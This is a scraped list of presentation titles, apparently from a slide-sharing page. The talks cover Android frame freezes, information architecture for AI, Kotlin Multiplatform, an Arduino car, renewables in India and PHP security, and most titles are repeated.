Connect Wave/ connectwave Pitch Deck Presentation
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 

SydPHP Security in PHP